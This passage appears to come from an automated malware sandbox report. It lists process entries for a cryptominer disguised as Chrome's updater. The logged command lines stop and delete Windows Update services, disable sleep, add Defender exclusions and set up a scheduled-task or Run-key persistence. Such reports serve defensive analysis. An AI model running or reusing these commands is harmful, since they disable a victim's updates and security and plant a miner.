                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                    Start time:16:20:10
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                    Start time:16:20:10
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                    Start time:16:20:10
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:sc stop UsoSvc
                                                                                                                                                                                                                                    Imagebase:0x7ff6d9b80000
                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                    Start time:16:20:10
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                    Imagebase:0x7ff77f210000
                                                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                    Start time:16:20:10
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                    Imagebase:0x7ff77f210000
                                                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                    Start time:16:20:10
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:sc stop WaaSMedicSvc
                                                                                                                                                                                                                                    Imagebase:0x7ff6d9b80000
                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                    Start time:16:20:11
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powercfg /x -standby-timeout-ac 0
                                                                                                                                                                                                                                    Imagebase:0x7ff77f210000
                                                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                    Start time:16:20:11
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:sc stop wuauserv
                                                                                                                                                                                                                                    Imagebase:0x7ff6d9b80000
                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                    Start time:16:20:11
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powercfg /x -standby-timeout-dc 0
                                                                                                                                                                                                                                    Imagebase:0x7ff77f210000
                                                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                    Start time:16:20:11
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:sc stop bits
                                                                                                                                                                                                                                    Imagebase:0x7ff6d9b80000
                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                    Start time:16:20:11
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:sc stop dosvc
                                                                                                                                                                                                                                    Imagebase:0x7ff6d9b80000
                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                    Start time:16:20:12
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                                                                                                                                                                    Imagebase:0x7ff608820000
                                                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                    Start time:16:20:12
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                                                                                                                                                                    Imagebase:0x7ff608820000
                                                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                                    Start time:16:20:12
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                                                                                                                                                    Imagebase:0x7ff608820000
                                                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                    Start time:16:20:12
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                                                                                                                                                    Imagebase:0x7ff608820000
                                                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                    Start time:16:20:12
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                                                                                                    Imagebase:0x7ff608820000
                                                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                    Start time:16:20:24
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                                                                                                                                                                                                                                    Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                    Start time:16:20:24
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                    Start time:16:20:25
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                                                                                                                                                                                                                                    Imagebase:0x7ff7c5040000
                                                                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                    Start time:16:20:25
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\updater.exe"
                                                                                                                                                                                                                                    Imagebase:0x7ff619070000
                                                                                                                                                                                                                                    File size:3'715'584 bytes
                                                                                                                                                                                                                                    MD5 hash:A4C45AAF11FC601009A5682FD23790EE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000002.2634403580.00007FF619210000.00000004.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                    Start time:16:20:25
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                                                                                    Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                                                    Start time:16:20:25
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                                                    Start time:16:20:28
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                                                                                                    Imagebase:0x7ff74e4d0000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                                                    Start time:16:20:28
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                                                    Start time:16:20:28
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                                                                                                                                    Imagebase:0x7ff74e4d0000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                                                    Start time:16:20:28
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:sc stop UsoSvc
                                                                                                                                                                                                                                    Imagebase:0x7ff6d9b80000
                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                                                    Start time:16:20:28
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                                                    Start time:16:20:28
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                    Imagebase:0x7ff77f210000
                                                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                                                                    Start time:16:20:28
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                                                                                                                                                                                                                    Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:44
                                                                                                                                                                                                                                    Start time:16:20:28
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:sc stop WaaSMedicSvc
                                                                                                                                                                                                                                    Imagebase:0x7ff6d9b80000
                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                                                    Start time:16:20:28
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                                                                    Start time:16:20:28
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                    Imagebase:0x7ff77f210000
                                                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:47
                                                                                                                                                                                                                                    Start time:16:20:28
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:sc stop wuauserv
                                                                                                                                                                                                                                    Imagebase:0x7ff6d9b80000
                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                                                                    Start time:16:20:28
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powercfg /x -standby-timeout-ac 0
                                                                                                                                                                                                                                    Imagebase:0x7ff77f210000
                                                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:49
                                                                                                                                                                                                                                    Start time:16:20:28
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:sc stop bits
                                                                                                                                                                                                                                    Imagebase:0x7ff6d9b80000
                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:50
